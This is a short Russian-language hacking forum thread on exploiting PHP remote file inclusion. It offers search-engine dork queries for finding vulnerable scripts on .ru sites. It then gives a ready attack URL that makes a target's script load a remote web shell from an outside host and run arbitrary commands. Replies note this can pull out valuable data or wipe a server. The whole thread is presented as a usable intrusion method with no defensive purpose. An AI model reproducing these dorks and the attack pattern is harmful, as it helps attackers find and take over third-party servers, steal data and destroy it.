• XSS.stack #1 – первый литературный журнал от юзеров форума

Php инклудинг

Статус
Закрыто для дальнейших ответов.

c31337

(L3) cache
Пользователь
Регистрация
31.12.2004
Сообщения
156
Реакции
2
inurl:"*./*.php?footen=*.php" site:.ru
inurl:"*./*.php?page=*.php" site:.ru
inurl:"*./*.php?header=*.php" site:.ru
inurl:"*./*.php?include=*.php" site:.ru
inurl:"*./*.php?inc=*.php" site:.ru
Если кому нада, то вот такие запросы нужно подавать поисковику, чтобы найти багу в пхп скриптах.
php?параметр=http://xssteam.narod.ru/conf.php&cmd=КОМАНДА - php including
Бага реализуется довольно просто.
1)Ищеш уязвимый скрипт(мне все равно как ты это сделаешь)
2)имя_скрипта.php?параметр=http://xssteam.narod.ru/conf.php&cmd=КОМАНДА
3)Наслаждаешься выполнением
 
eRweB, наскока я понял, это баги в самодельных скриптах, в которых для выполнения какого-то действия используется отдельный файл со скриптом (иногда находящемся на другом сайте), причем урл этого служебного скрипта явно указывается в запросе. Следовательно, если "скормить" этому ламерскому скрипту свой, если так можно выразиться, php-троян (вместо служебного), лежащий, скажем, на яндексовском хосте, мы заставим скрипт выдать нам всякую ценную инфу или стереть все к чертям собачьим. :)
 
Ну в общем это так.http://xssteam.narod.ru/conf.php - это адресс до веб шелла. Ему даешь команду а сервер ее исполняет.
 
Статус
Закрыто для дальнейших ответов.
Верх